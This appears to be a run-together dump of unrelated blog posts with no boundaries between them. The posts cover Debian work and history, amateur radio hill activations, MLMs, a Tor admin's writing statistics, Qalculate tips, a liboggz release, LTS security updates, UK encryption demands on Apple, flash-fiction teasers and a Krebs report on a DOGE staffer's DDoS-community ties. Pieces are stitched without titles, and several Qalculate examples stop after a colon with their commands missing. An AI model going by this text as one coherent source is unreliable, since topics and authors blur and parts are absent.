Going to my first Debconf was really a turning point. My first one was Mar del Plata in Argentina in August 2008, when I was 21. That was quite an excitement, traveling that far from Germany for the first time. The personal connections I made there made quite the difference. It was also a big boost for motivation. I attended 8 (Argentina), 9 (Spain), 10 (New York), 11 (Bosnia and Herzegovina), 12 (Nicaragua), 13 (Switzerland), 14 (Portland), 15 (Germany), 16 (South Africa), and hopefully I'll make it to this year's in Brest. At all of them I did not see much of the countries as I prioritized all of my time focused on Debian, even skipping some of the day trips in favor of team meetings. Yet I am very grateful to the project (and to my employer) for shipping me there.
I ended up as Stable Release
Manager for a while, from August 2008 - when Martin Zobel-Helas moved
into DSA - until I got dropped in March 2020. I think my biggest achievements were pushing for the
creation of -updates in favor of a separate volatile archive and a
change of the update policy to allow for more common sense updates in
the main archive vs. the very strict "breakage or security" policy we
had previously. I definitely need to call out Adam D. Barratt for being the partner in crime, holding up the fort for even longer.
In 2009 I got too annoyed at the existing wanna-build team not being responsive anymore and pushed for the system to be given to a new team. I did not build it and significant contributions were done by other people (like Andreas Barth and Joachim Breitner, and later Aurelien Jarno). I mostly reworked the way the system was triggered, investigated when it broke and was around when people wanted things merged.
In the meantime I worked sys/netadmin jobs while at university, both paid and as a volunteer with the students' council. For a year or two I was the administrator of a System z mainframe IBM donated to my university. We had a mainframe course and I attended two related conferences. That's where my s390(x) interest came from, although credit for the port needs to go to Aurelien Jarno.
Since completing university in 2013 I have been working for a company for almost 12 years. Debian experience was very relevant to the job and I went on maintaining a Linux distro or two at work - before venturing off into security hardening. People in megacorps - in my humble opinion - disappear from the volunteer projects because a) they might previously have been studying and thus had a lot more time on their hands and b) the job is too similar to the volunteer work and thus the same brain cells used for work are exhausted and can't be easily reused for volunteer work. I kept maintaining a couple of things (buildds, some packages) - mostly because of a sense of commitment and responsibility, but otherwise kind of scaled down my involvement. I also felt less connected as I dropped off IRC.
Last year I finally made it to Debian events again: MiniDebconf in Berlin, where we discussed the aftermath of the xz incident, and the Debian BSP in Salzburg. I rejoined IRC using the Matrix bridge. That also rekindled my involvement, with me guiding a new DD through NM and ending up in DSA. To be honest, only in the last two or three years I felt like a (more) mature old-timer.
I have a new gig at work lined up to start soon and next to that I have sysadmining for Debian. It is pretty motivating to me that I can just get things done - something that is much harder to achieve at work due to organizational complexities. It balances out some frustration I'd otherwise have. The work is different enough to be enjoyable and the people I work with are great.
The future
I still think the work we do in Debian is important, as much as I see a lack of appreciation in a world full of containers. We are reaping most of the benefits of standing on the shoulders of giants and of great decisions made in the past (e.g. the excellent Debian policy, but also the organizational model) that made Debian what it is today.
Given the increase in size and complexity of what Debian ships - and the somewhat dwindling resource of developer time, it would benefit us to have better processes for large-scale changes across all packages. I greatly respect the horizontal effects that are currently being driven and that suck up a lot of energy.
A lot of our infrastructure is also aging and not super well maintained. Many take it for granted that the services we have keep existing, but most are only maintained by a person or two, if even. Software stacks are aging and it is even a struggle to have all necessary packages in the next release.
Hopefully I can contribute a bit or two to these efforts in the future.
It’s been quite the week of radio related nonsense for me, where I’ve been
channelling my time and brainspace for radio into activity on air and system
refinements, not working on Debian.
POTA, Antennas and why do my toys not work?
Having had my interest piqued by
Ian at mastodon.radio, I
looked online and spotted a couple of parks within stumbling distance of my
house, that’s good news! It looks like the list has been refactored and
expanded
since I last looked at it, so there are now more entities to activate and
explore.
My concerns about antennas noted last
week rumbled on. There was a
second strand to this concern too, my end fed 64:1 (or 49:1?!) transformer from
MM0OPX sits in my mind as not having worked very well in
Spain last year, and I want to get to the bottom of why. As with most things in
my life, it’s probably a me problem.
I came up with a cunning plan - firstly, buy a new
mast to
replace the one I broke a few weeks back on Cat
Law.
Secondly, buy a couple of new connectors and some heatshrink to reterminate my
cable that I’m sure is broken.
Spending more money on a problem never hurt anyone, right?
Come Wednesday, the new toys arrived and I figured combining everything into one
convenient night time walk and radio was a good plan.
After circling a bit to find somewhere suitable (there appear to be construction
works in the park!) I set up my gear in 2C with frost on the ground, called CQ,
spotted and got nothing on either the end fed half wave or the cheap vertical.
As it was too late for 20m, I tried 40 and a bit of 80 using the inbuilt tuner,
but wasn’t heard by stations I called or when calling independently.
I packed everything up and lora-doofered my way home, mildly deflated.
Try it at home
It still didn’t sit with me that the end fed wasn’t working, so come Friday night I
set it up in the back garden/woods behind the house to try and diagnose why it
wasn’t working.
Up it went, I worked some Irish stations pretty effortlessly, and down
everything came. No complaints - the only things I did differently was have the
feedpoint a little higher and check my power, limiting it to 10W. The G90 can do
20W, I wonder if running at that was saturating the core in the 64:1.
At some point in the evening I stepped in some dog’s shit too, and spent some
time cleaning my boots outside to avoid further tramping the smell through the
house.
Win some, lose some.
Take it to the Hills
On Friday, some of the other GM-ES Sota-ists had been out for an activity
day.
On account of me being busy in work, I couldn’t go outside to play, but I
figured a weekend of activity was on the books.
Before I hit the hills, I took myself to the
hackerspace and printed myself a K6ARK
Winder and a guy
ring for the mast, cut string, tied
it together and wound the string on to the winder.
I also took time to buzz out my wonky coax and it showed great continuity. Hmm,
that can be continued later. I didn’t quite get to crimping the radial network
of the Aliexpress whip with a 12mm stud crimp, that can also be put on the TODO
list.
Tap O’ Noth
Once finally out, the weather was a bit cloudy with passing snow showers, but in
between the showers I was above the clouds and the air was clear:
After a mild struggle on 2m, I set up the end fed the first hill and got to
work from the old hill fort:
The end fed worked flawlessly. Exactly as promised, switching between 7MHz, 14MHz, 21MHz
and 28MHz without a tuner was perfect, I chased hills on all the bands, and had a
great time. Apart from 40m, where there was absolutely no space due to a
contest. That wasn’t such a fun time!
My fingers were bitterly cold, so on went the big gloves for the descent and I
felt like I was warm by the time I made it back to the car.
It worked so well, in fact, I took the 1/4 wave cheap vertical out my bag and
decided to brave it on the next activation.
Lord Arthur’s Hill
GM5ALX has posted a .gpx to sotlas which is
shorter than the other ascent, but much sharper - I figured this would be a fun
new way to try up the hill!
It takes you right through the heart of the Littlewood Park estate, and I felt a
bit uncomfortable walking straight past the estate cottages, especially when
there were vehicles moving and active work happening. Presumably this is where
Lord Arthur lived, at the foot of his hill.
I cut through the woods to the west of the cottages, disturbing some deer and
many, many pheasants, but I met the path fairly quickly. From there it was a 2km
walk, 300m vertical ascent. Short and sharp!
At the top, I was treated to a view of the hill I had activated only an hour or
so before, which is a view that always makes me smile:
To get some height for the feedpoint, I wrapped the coax around my winder a
couple of turns and trapped it with the elastic while draping the coax over the
trig. This bought me some more height and I felt clever because of it. Maybe a
pole would be easier?
From here, I worked inter-G on 40m and had a wee pile up, eventually working 15
or so European stations on 20m. Pleased with that!
I had been considering a third hill, but home was the call in the failing light.
Back to the car I walked to find my key didn’t have any battery, so out came the
Audi App and I used the Internet of Things to unlock my car. The modern world is
bizarre.
Sunday - Cloudy Head // Head in the Clouds
Sunday started off migraney, so I stayed within the confines of my house until I
felt safe driving! After some back and forth in my cloudy head, I opted for the
easier option of Ladylea Hill as I wasn’t
feeling up for major physical exertion.
It was a long drive, after which I felt more wonky, but I hit the path
eventually - I run to Hibby Standard Time, a few hours to a few days behind the
rest of GM/ES. I was ready to bail if my head didn’t improve, but it turns out,
fresh cold air, silence and bloodflow helped.
Ladylea Hill was incredibly quiet, a feature I really appreciated. It feels
incredibly remote, with a long winding drive down Glenbuchat, which still has
ice on the surface of the lochs and standing water.
A brooding summit crowned with grey cloud in fantastic scenery that only revealed itself
upon the clouds blowing through:
I set up at the cairn and picked up 30 contacts overall, split between 40m and
20m, with some inter-g on 40 and a couple of continental surprises. 20 had
longer skip today, so I saw Spain, Finland, Slovenia, Poland.
On teardown, I managed to snap the top segment of my brand new mast with my
cold, clumsy fingers, but thankfully sotabeams stock replacements. More money at
the problem, again.
Back to the car, no app needed, and homeward bound as the light faded.
At the end of the weekend, I find myself finally over 100 activator points and
over 400 chaser points. Somehow I’ve collected more points this year already
than last year, the winter bonuses really do stack up!
Addendum - OSMAnd & Open Street Map
I’ve been using OSMAnd on my iPhone quite extensively
recently, I think offline mapping is super important if you’re going out to get
mildly lost in the hills. On more than one occasion, I have confidently set off
in the wrong direction in the mist, and maps have saved my bacon!
As you can download .gpx files, it’s great to have them on the device and
available for guidance in case you get lost, coupled with an offline map. Plus,
as I drive around I love to have the dark red of a hill I’ve walked appear on
the map in my car dash or in my hand:
This weekend I discovered it’s possible to have height maps for nice 3d
maps and contours marked on the map - you just need to download some
additions for the maps. This is a really nice feature, it makes maps more
pretty and more useful when you’re in the middle of nowhere.
GM5ALX has set to adding the summits around Scotland
here.
While the benefits aren’t immediately obvious, it allows developers of mapping
applications access to more data at no extra cost, really. It helps add depth to
an already rich set of information, and allows us as radio amateurs to do more
interesting things with maps and not be shackled to Apple/Google.
Because it’s open data, we can also fix things we find wrong as users. I like to
fix road surfaces after I’ve been cycling as that will feed forward to route
planning through Komoot and data on my wahoo too, which can be modified with
osm maps.
In the future, it’s possible to have an OSMAnd plugin highlighting local SOTA
summits or mimicking features of sotl.as but offline.
It’s cool to be able to put open technologies to use like this in the field and
really is the convergence point of all my favourite things!
MLMs prey on the poor and desperate: women, people of color, people in dying small towns and decaying rustbelt cities. It’s not just that these people are desperate – it’s that they only survive through networks of mutual aid. Poor women rely on other poor women to help with child care, marginalized people rely on one another for help with home maintenance, small loans, a place to crash after an eviction, or a place to park the RV you’re living out of.
In other words, people who lack monetary capital must rely on social capital for survival. That’s why MLMs target these people: an MLM is a system for destructively transforming social capital into monetary capital. MLMs exhort their members to mine their social relationships for “leads” and “customers” and to use the language of social solidarity (“women helping women”) to wheedle, guilt, and arm-twist people from your mutual aid network into buying things they don’t need and can’t afford.
But it’s worse, because what MLMs really sell is MLMs. The real purpose of an MLM sales call is to convince the “customer” to become an MLM salesperson, who owes you a share of every sale they make and is incentivized to buy stock they don’t need (from you) in order to make quotas. And of course, their real job is to sign up other salespeople to work under them, and so on.
Well, 2024 will be remembered, won't it? I guess 2025 already wants to
make its mark too, but let's not worry about that right now, and
instead let's talk about me.
A little over a year ago, I was gloating
over how I had such a great blogging year in 2022, and was considering
2023 to be average, then went on to gather more stats and traffic
analysis... Then I said, and I quote:
I hope to write more next year. I've been thinking about a few posts I
could write for work, about how things work behind the scenes at Tor,
that could be informative for many people. We run a rather old setup,
but things hold up pretty well for what we throw at it, and it's worth
sharing that with the world...
What a load of bollocks.
A bad year for this blog
2024 was the second worst year ever in my blogging history, tied with
2009 at a measly 6 posts for the year:
It's not that I have nothing to say: I have no less than five drafts
in my working tree here, not counting three actual drafts recorded
in the Git repository here:
I just don't have time to wrap those things up. I think part of me is
disgusted by seeing my work stolen by large corporations to build
proprietary large language models while my idols have been pushed
to suicide for trying to share science with the world.
Another part of me wants to make those things just right. The
"tagged drafts" above are nothing more than a huge pile of chaotic
links, far from being useful for anyone else than me, and even
then.
The on-dying article, in particular, is becoming my nemesis. I've
been wanting to write that article for over 6 years now, I think. It's
just too hard.
Writing elsewhere
There's also the fact that I write for work already. A lot. Here are
the top-10 contributors to our team's wiki:
anarcat@angela:help.torproject.org$ git shortlog --numbered --summary --group="format:%al" | head -10
4272 anarcat
423 jerome
117 zen
116 lelutin
104 peter
58 kez
45 irl
43 hiro
18 gaba
17 groente
... but that's a bit unfair, since I've been there half a
decade. Here's the last year:
anarcat@angela:help.torproject.org$ git shortlog --since=2024-01-01 --numbered --summary --group="format:%al" | head -10
827 anarcat
117 zen
116 lelutin
91 jerome
17 groente
10 gaba
8 micah
7 kez
5 jnewsome
4 stephen.swift
So I still write the most commits! But to truly get a sense of the
amount I wrote in there, we should count actual changes. Here it is by
number of lines (from commandlinefu.com):
anarcat@angela:help.torproject.org$ git ls-files | xargs -n1 git blame --line-porcelain | sed -n 's/^author //p' | sort -f | uniq -ic | sort -nr | head -10
99046 Antoine Beaupré
6900 Zen Fu
4784 Jérôme Charaoui
1446 Gabriel Filion
1146 Jerome Charaoui
837 groente
705 kez
569 Gaba
381 Matt Traudt
237 Stephen Swift
That, of course, is the entire history of the git repo, again. We
should take only the last year into account, and probably ignore the
tails directory, as sneaky Zen Fu imported the entire docs from
another wiki there...
anarcat@angela:help.torproject.org$ find [d-s]* -type f -mtime -365 | xargs -n1 git blame --line-porcelain 2>/dev/null | sed -n 's/^author //p' | sort -f | uniq -ic | sort -nr | head -10
75037 Antoine Beaupré
2932 Jérôme Charaoui
1442 Gabriel Filion
1400 Zen Fu
929 Jerome Charaoui
837 groente
702 kez
569 Gaba
381 Matt Traudt
237 Stephen Swift
Pretty good! 75k lines. But those are the files that were modified in
the last year. If we go a little more nuts, we find that:
I wrote 126,116 words in that wiki, only in the last year. I also
deleted 37k words, so the final total is more like 89k words, but
still: that's about forty (40!) articles of the average size (~2k) I
wrote in 2022.
(And yes, I did go nuts and write a new log parser, essentially from
scratch, to figure out those word diffs. I did get the courage only
after asking GPT-4o for an example first, I must admit.)
Let's celebrate that again: I wrote 90 thousand words in that wiki
in 2024. According to Wikipedia, a "novella" is 17,500 to 40,000
words, which would mean I wrote about a novella and a novel, in the
past year.
But interestingly, if I look at the repository analytics. I
certainly didn't write that much more in the past year. So that
alone cannot explain the lull in my production here.
Arguments
Another part of me is just tired of the bickering and arguing on the
internet. I have at least two articles in there that I suspect is
going to get me a lot of push-back (NixOS and Fish). I know how to
deal with this: you need to write well, consider the controversy,
spell it out, and defuse things before they happen. But that's hard
work and, frankly, I don't really care that much about what people
think anymore.
I'm not writing here to convince people. I have stop evangelizing a
long time ago. Now, I'm more into documenting, and teaching. And,
while teaching, there's a two-way interaction: when you give out a
speech or workshop, people can ask questions, or respond, and you all
learn something. When you document, you quickly get told "where is
this? I couldn't find it" or "I don't understand this" or "I tried
that and it didn't work" or "wait, really? shouldn't we do X instead",
and you learn.
Here, it's static. It's my little soapbox where I scream in the
void. The only thing people can do is scream back.
Collaboration
So.
Let's see if we can work together here.
If you don't like something I say, disagree, or find something wrong
or to be improved, instead of screaming on social media or ignoring
me, try contributing back. This site here is backed by a git
repository and I promise to read everything you send there,
whether it is an issue or a merge request.
I will, of course, still read comments sent by email or IRC or social
media, but please, be kind.
You can also, of course, follow the latest changes on the TPA
wiki. If you want to catch up with the last year, some of the
"novellas" I wrote include:
TPA-RFC-71: Emergency email deployments, phase B: deploy a new
sender-rewriting mail forwarder, migrate mailing lists off the
legacy server to a new machine, migrate the remaining Schleuder list
to the Tails server, upgrade eugeni.
Author: Sam E. Sutin Sometimes, acronyms can be misleading. For example, artificial intelligence (AI) and artificial insemination (AI), while both artificial, do differ in some very important ways. In my defense, with technology evolving so quickly these past few years it has become exponentially difficult keeping track of every little modicum of advancement. I didn’t […]
This is going to be a controversial statement because some people are
absolute nerds about this, but, I need to say it.
Qalculate is the best calculator that has ever been made.
I am not going to try to convince you of this, I just wanted to put
out my bias out there before writing down those notes. I am a total
fan.
This page will collect my notes of cool hacks I do with
Qalculate. Most examples are copy-pasted from the command-line
interface (qalc(1)), but I typically use the graphical interface as
it's slightly better at displaying complex formulas. Discoverability
is obviously also better for the cornucopia of features this fantastic
application ships.
Qalc commandline primer
On Debian, Qalculate's CLI interface can be installed with:
apt install qalc
Then you start it with the qalc command, and end up on a prompt:
There's a bunch of variables to control display, approximation, and so
on:
> set precision 6
> 1/7
1 / 7 ≈ 0.142857
> set precision 20
> pi
pi ≈ 3.1415926535897932385
When I need more, I typically browse around the menus. One big issue I
have with Qalculate is there are a lot of menus and features. I had
to fiddle quite a bit to figure out that set precision command
above. I might add more examples here as I find them.
Bandwidth estimates
I often use the data units to estimate bandwidths. For example, here's
what 1 megabit per second is over a month ("about 300 GiB"):
> 1 megabit/s * 30 day to gibibyte
(1 megabit/second) × (30 days) ≈ 301.7 GiB
Or, "how long will it take to download X", in this case, 1GiB over a
100 mbps link:
> 1GiB/(100 megabit/s)
(1 gibibyte) / (100 megabits/second) ≈ 1 min + 25.90 s
Password entropy
To calculate how much entropy (in bits) a given password structure,
you count the number of possibilities in each entry (say, [a-z] is
26 possibilities, "one word in a 8k dictionary" is 8000), extract the
base-2 logarithm, multiplied by the number of entries.
For example, an alphabetic 14-character password is:
> log2(26*2)*14
log₂(26 × 2) × 14 ≈ 79.81
... 80 bits of entropy. To get the equivalent in a Diceware
password with a 8000 word dictionary, you would need:
The graphical version has a little graphical indicator that, when you
mouse over, tells you where the rate comes from.
Other conversions
Here are other neat conversions extracted from my history
> teaspoon to ml
teaspoon = 5 mL
> tablespoon to ml
tablespoon = 15 mL
> 1 cup to ml
1 cup ≈ 236.6 mL
> 6 L/100km to mpg
(6 liters) / (100 kilometers) ≈ 39.20 mpg
> 100 kph to mph
100 kph ≈ 62.14 mph
> (108km - 72km) / 110km/h
((108 kilometers) − (72 kilometers)) / (110 kilometers/hour) ≈
19 min + 38.18 s
Completion time estimates
This is a more involved example I often do.
Background
Say you have started a long running copy job and you don't have the
luxury of having a pipe you can insert pv(1) into to get a nice
progress bar. For example, rsync or cp -R can have that problem
(but not tar!).
(Yes, you can use --info=progress2 in rsync, but that estimate is
incremental and therefore inaccurate unless you disable the
incremental mode with --no-inc-recursive, but then you pay a huge
up-front wait cost while the entire directory gets crawled.)
Extracting a process start time
First step is to gather data. Find the process start time. If you were
unfortunate enough to forget to run date --iso-8601=seconds before
starting, you can get a similar timestamp with stat(1) on the
process tree in /proc with:
So our start time is 2025-02-07 15:50:25, we shave off the
nanoseconds there, they're below our precision noise floor.
If you're not dealing with an actual UNIX process, you need to figure
out a start time: this can be a SQL query, a network request,
whatever, exercise for the reader.
Saving a variable
This is optional, but for the sake of demonstration, let's save this
as a variable:
Next, estimate your data size. That will vary wildly with the job
you're running: this can be anything: number of files, documents being
processed, rows to be destroyed in a database, whatever. In this case,
rsync tells me how many bytes it has transferred so far:
Strip off the weird dots in there, because that will confuse
qalculate, which will count this as:
2.968252503968 bytes ≈ 2.968 B
Or, essentially, three bytes. We actually transferred almost 3TB here:
2968252503968 bytes ≈ 2.968 TB
So let's use that. If you had the misfortune of making rsync silent,
but were lucky enough to transfer entire partitions, you can use df
(without -h! we want to be more precise here), in my case:
Filesystem 1K-blocks Used Available Use% Mounted on
/dev/mapper/vg_hdd-srv 7512681384 7258298036 179205040 98% /srv
tank/srv 7667173248 2870444032 4796729216 38% /srv-zfs
(Otherwise, of course, you use du -sh $DIRECTORY.)
Digression over bytes
Those are 1 K bytes which is actually (and rather unfortunately)
Ki, or "kibibytes" (1024 bytes), not "kilobytes" (1000 bytes). Ugh.
> 2870444032 KiB
2870444032 kibibytes ≈ 2.939 TB
> 2870444032 kB
2870444032 kilobytes ≈ 2.870 TB
At this scale, those details matter quite a bit, we're talking about a
69GB (64GiB) difference here:
> uptime
uptime = 5 d + 6 h + 34 min + 12.11 s
> golden
golden ≈ 1.618
> exact
golden = (√(5) + 1) / 2
Computing dates
In any case, yay! We know the transfer is going to take roughly 60
hours total, and we've already spent around 24h of that, so, we have
36h left.
But I did that all in my head, we can ask more of Qalc yet!
Let's make another variable, for that total estimated time:
> total=(now-start)/x = (2996538438607 bytes)/(7258298064 KiB)
save(((now − start) / x) = ((2996538438607 bytes) / (7258298064
kibibytes)); total; Temporary; ; 1) ≈
2 d + 11 h + 14 min + 38.22 s
And we can plug that into another formula with our start time to
figure out when we'll be done!
> start+total
start + total ≈ "2025-02-10T03:28:52"
> start+total-now
start + total − now ≈ 1 d + 11 h + 34 min + 48.52 s
> start+total-now to h
start + total − now ≈ 35 h + 34 min + 32.01 s
That transfer has ~1d left, or 35h24m32s, and should complete around 4
in the morning on February 10th.
But that's icing on top. I typically only do the
cross-multiplication and calculate the remaining time in my
head.
I mostly did the last bit to show Qalculate could compute dates and
time differences, as long as you use ISO timestamps. Although it can
also convert to and from UNIX timestamps, it cannot parse arbitrary
date strings (yet?).
Other functionality
Qalculate can:
Plot graphs;
Use RPN input;
Do all sorts of algebraic, calculus, matrix, statistics,
trigonometry functions (and more!);
... and so much more!
I have a hard time finding things it cannot do. When I get there, I
typically need to resort to programming code in Python, use a
spreadsheet, and others will turn to more complete engines like
Maple, Mathematica or R.
A little over a week ago, I noticed
the liboggz
package on my Debian dashboard had not had a new upstream release
for a while. A closer look showed that its last release, version
1.1.1, happened in 2010. A few patches had accumulated in the Debian
package, and I even noticed that I had passed on these patches to
upstream five years ago. A handful crash bugs had been reported
against the Debian package, and looking at the upstream repository I
even found a few crash bugs reported there too. To add insult to
injury, I discovered that upstream had accumulated several fixes in the
years between 2010 and now, and many of them had not made their way
into the Debian package. I decided enough was enough, and that a new
upstream release was needed fixing these nasty crash bugs. Luckily I
am also a member of the Xiph team, aka upstream, and could actually go
to work immediately to fix it.
I started by adding automatic build testing on
the Xiph gitlab oggz
instance, to get a better idea of the state of affairs with the
code base. This exposed a few build problems, which I had to fix. In
parallel to this, I sent an email announcing my wish for a new release
to every person who had committed to the upstream code base since
2010, and asked for help doing a new release both on email and on the
#xiph IRC channel. Sadly only a fraction of their email providers
accepted my email. But Ralph Giles in the Xiph team came to the
rescue and provided invaluable help to guide be through the release
Xiph process. While this was going on, I spent a few days tracking
down the crash bugs with good help from
valgrind, and came up with
patch proposals to get rid of at least these specific crash bugs. The
open issues also had to be checked. Several of them proved to be
fixed already, but a few I had to creat patches for. I also checked
out the Debian, Arch, Fedora, Suse and Gentoo packages to see if there
were patches applied in these Linux distributions that should be
passed upstream. The end result was ready yesterday. A new liboggz
release, version 1.1.2, was tagged, wrapped up and published on the
project page. And today, the new release was uploaded into
Debian.
You are probably by now curious on what actually changed in the
library. I guess the most interesting new feature was support for
Opus and VP8. Almost all other changes were stability or
documentation fixes. The rest were related to the gitlab continuous
integration testing. All in all, this was really a minor update,
hence the version bump only from 1.1.1 to to 1.1.2, but it was long
overdue and I am very happy that it is out the door.
One change proposed upstream was not included this time, as it
extended the API and changed some of the existing library methods, and
thus require a major SONAME bump and possibly code changes in every
program using the library. As I am not that familiar with the code
base, I am unsure if I am the right person to evaluate the change.
Perhaps later.
Since the release was tagged, a few minor fixes has been committed
upstream already: automatic testing the cross building to Windows, and
documentation updates linking to the correct project page. If a
important issue is discovered with this release, I guess a new release
might happen soon including the minor fixes. If not, perhaps they can
wait fifteen years. :)
I would like to send a big thank you to everyone that helped make
this release happen, from the people adding fixes upstream over the
course of fifteen years, to the ones reporting crash bugs, other bugs
and those maintaining the package in various Linux distributions.
Thank you very much for your time and interest.
As usual, if you use Bitcoin and want to show your support of my
activities, please send Bitcoin donations to my address
15oWEoG9dUPovwmUL9KWAnYRtNJEkP1u1b.
This was my hundred-twenty-seventh month that I did some work for the Debian LTS initiative, started by Raphael Hertzog at Freexian. During my allocated time I uploaded or worked on:
[DLA 4014-1] gnuchess security update to fix one CVE related to arbitrary code execution via crafted PGN (Portable Game Notation) data.
[DLA 4015-1] rsync update to fix five CVEs related leaking information from the server or writing files outside of the client’s intended destination.
[DLA 4015-2] rsync update to fix an upstream regression.
[DLA 4039-1] ffmpeg update to fix three CVEs related to possible integer overflows, double-free on
errors and out-of-bounds access.
As new CVEs for ffmpeg appeared, I started to work again for an update of this package
Last but not least I did a week of FD this month and attended the monthly LTS/ELTS meeting.
Debian ELTS
This month was the seventy-eighth ELTS month. During my allocated time I uploaded or worked on:
[ELA-1290-1] rsync update to fix five CVEs in Buster, Stretch and Jessie related leaking information from the server or writing files outside of the client’s intended destination.
[ELA-1290-2] rsync update to fix an upstream regression.
[ELA-1313-1] ffmpeg update to fix six CVEs in Buster related to possible integer overflows, double-free on errors and out-of-bounds access.
[ELA-1314-1] ffmpeg update to fix six CVEs in Stretch related to possible integer overflows, double-free on errors and out-of-bounds access.
As new CVEs for ffmpeg appeared, I started to work again for an update of this package
Last but not least I did a week of FD this month and attended the monthly LTS/ELTS meeting.
Debian Printing
This month I uploaded new packages or new upstream or bugfix versions of:
… brlaser new upstream release (in new upstream repository)
This month I uploaded new packages or new upstream or bugfix versions of:
… calceph sponsored upload of new upstream version
… libxisf sponsored upload of new upstream version
Patrick, our Outreachy intern for the Debian Astro project, is doing very well and deals with task after task. He is working on automatic updates of the indi 3rd-party drivers and maybe the results of his work will already be part of Trixie.
Debian IoT
Unfortunately I didn’t found any time to work on this topic.
Debian Mobcom
This month I uploaded new packages or new upstream or bugfix versions of:
The Washington Post is reporting that the UK government has served Apple with a “technical capability notice” as defined by the 2016 Investigatory Powers Act, requiring it to break the Advanced Data Protection encryption in iCloud for the benefit of law enforcement.
This is a big deal, and something we in the security community have worried was coming for a while now.
The law, known by critics as the Snoopers’ Charter, makes it a criminal offense to reveal that the government has even made such a demand. An Apple spokesman declined to comment.
Apple can appeal the U.K. capability notice to a secret technical panel, which would consider arguments about the expense of the requirement, and to a judge who would weigh whether the request was in proportion to the government’s needs. But the law does not permit Apple to delay complying during an appeal.
In March, when the company was on notice that such a requirement might be coming, it told Parliament: “There is no reason why the U.K. [government] should have the authority to decide for citizens of the world whether they can avail themselves of the proven security benefits that flow from end-to-end encryption.”
Apple is likely to turn the feature off for UK users rather than break it for everyone worldwide. Of course, UK users will be able to spoof their location. But this might not be enough. According to the law, Apple would not be able to offer the feature to anyone who is in the UK at any point: for example, a visitor from the US.
And what happens next? Australia has a law enabling it to ask for the same thing. Will it? Will even more countries follow?
Author: Mark Renney The rumours began some twelve months ago or so and the idea quickly took hold that there was an unseen presence under the Dome, a ghost haunting the Fields of Research. These murmurings were persistent and frequent with everyone telling the same tale, describing how they had felt something or, more accurately, […]
Wired reported this week that a 19-year-old working for Elon Musk‘s so-called Department of Government Efficiency (DOGE) was given access to sensitive US government systems even though his past association with cybercrime communities should have precluded him from gaining the necessary security clearances to do so. As today’s story explores, the DOGE teen is a former denizen of ‘The Com,’ an archipelago of Discord and Telegram chat channels that function as a kind of distributed cybercriminal social network for facilitating instant collaboration.
Since President Trump’s second inauguration, Musk’s DOGE team has gained access to a truly staggering amount of personal and sensitive data on American citizens, moving quickly to seize control over databases at the U.S. Treasury, the Office of Personnel Management, the Department of Education, and the Department of Health and Human Resources, among others.
Wired first reported on Feb. 2 that one of the technologists on Musk’s crew is a 19-year-old high school graduate named Edward Coristine, who reportedly goes by the nickname “Big Balls” online. One of the companies Coristine founded, Tesla.Sexy LLC, was set up in 2021, when he would have been around 16 years old.
“Tesla.Sexy LLC controls dozens of web domains, including at least two Russian-registered domains,” Wired reported. “One of those domains, which is still active, offers a service called Helfie, which is an AI bot for Discord servers targeting the Russian market. While the operation of a Russian website would not violate US sanctions preventing Americans doing business with Russian companies, it could potentially be a factor in a security clearance review.”
Mr. Coristine has not responded to requests for comment. In a follow-up story this week, Wired found that someone using a Telegram handle tied to Coristine solicited a DDoS-for-hire service in 2022, and that he worked for a short time at a company that specializes in protecting customers from DDoS attacks.
A profile photo from Coristine’s WhatsApp account.
Internet routing records show that Coristine runs an Internet service provider called Packetware (AS400495). Also known as “DiamondCDN,” Packetware currently hosts tesla[.]sexy and diamondcdn[.]com, among other domains.
DiamondCDN was advertised and claimed by someone who used the nickname “Rivage” on several Com-based Discord channels over the years. A review of chat logs from some of those channels show other members frequently referred to Rivage as “Edward.”
From late 2020 to late 2024, Rivage’s conversations would show up in multiple Com chat servers that are closely monitored by security companies. In November 2022, Rivage could be seen requesting recommendations for a reliable and powerful DDoS-for-hire service.
Rivage made that request in the cybercrime channel “Dstat,” a core Com hub where users could buy and sell attack services. Dstat’s website dstat[.]cc was seized in 2024 as part of “Operation PowerOFF,” an international law enforcement action against DDoS services.
Coristine’s LinkedIn profile said that in 2022 he worked at an anti-DDoS company called Path Networks, which Wired generously described as a “network monitoring firm known for hiring reformed blackhat hackers.” Wired wrote:
“At Path Network, Coristine worked as a systems engineer from April to June of 2022, according to his now-deleted LinkedIn résumé. Path has at times listed as employees Eric Taylor, also known as Cosmo the God, a well-known former cybercriminal and member of the hacker group UGNazis, as well as Matthew Flannery, an Australian convicted hacker whom police allege was a member of the hacker group LulzSec. It’s unclear whether Coristine worked at Path concurrently with those hackers, and WIRED found no evidence that either Coristine or other Path employees engaged in illegal activity while at the company.”
The founder of Path is a young man named Marshal Webb. I wrote about Webb back in 2016, in a story about a DDoS defense company he co-founded called BackConnect Security LLC. On September 20, 2016, KrebsOnSecurity published data showing that the company had a history of hijacking Internet address space that belonged to others.
The other founder of BackConnect Security LLC was Tucker Preston, a Georgia man who pleaded guilty in 2020 to paying a DDoS-for-hire service to launch attacks against others.
The aforementioned Path employee Eric Taylor pleaded guilty in 2017 to charges including an attack on our home in 2013. Taylor was among several men involved in making a false report to my local police department about a supposed hostage situation at our residence in Virginia. In response, a heavily-armed police force surrounded my home and put me in handcuffs at gunpoint before the police realized it was all a dangerous hoax known as “swatting.”
CosmoTheGod rocketed to Internet infamy in 2013 when he and a number of other hackers set up the Web site exposed[dot]su, which “doxed” dozens of public officials and celebrities by publishing the address, Social Security numbers and other personal information on the former First Lady Michelle Obama, the then-director of the FBI and the U.S. attorney general, among others. The group also swatted many of the people they doxed.
Wired noted that Coristine only worked at Path for a few months in 2022, but the story didn’t mention why his tenure was so short. A screenshot shared on the website pathtruths.com includes a snippet of conversations in June 2022 between Path employees discussing Coristine’s firing.
According to that record, Path founder Marshal Webb dismissed Coristine for leaking internal documents to a competitor. Not long after Coristine’s termination, someone leaked an abundance of internal Path documents and conversations. Among other things, those chats revealed that one of Path’s technicians was a Canadian man named Curtis Gervais who was convicted in 2017 of perpetrating dozens of swatting attacks and fake bomb threats — including at least two attempts against our home in 2014.
A snippet of text from an internal Path chat room, wherein members discuss the reason for Coristine’s termination: Allegedly, leaking internal company information. Source: Pathtruths.com.
On May 11, 2024, Rivage posted on a Discord channel for a DDoS protection service that is chiefly marketed to members of The Com. Rivage expressed frustration with his time spent on Com-based communities, suggesting that its profitability had been oversold.
“I don’t think there’s a lot of money to be made in the com,” Rivage lamented. “I’m not buying Heztner [servers] to set up some com VPN.”
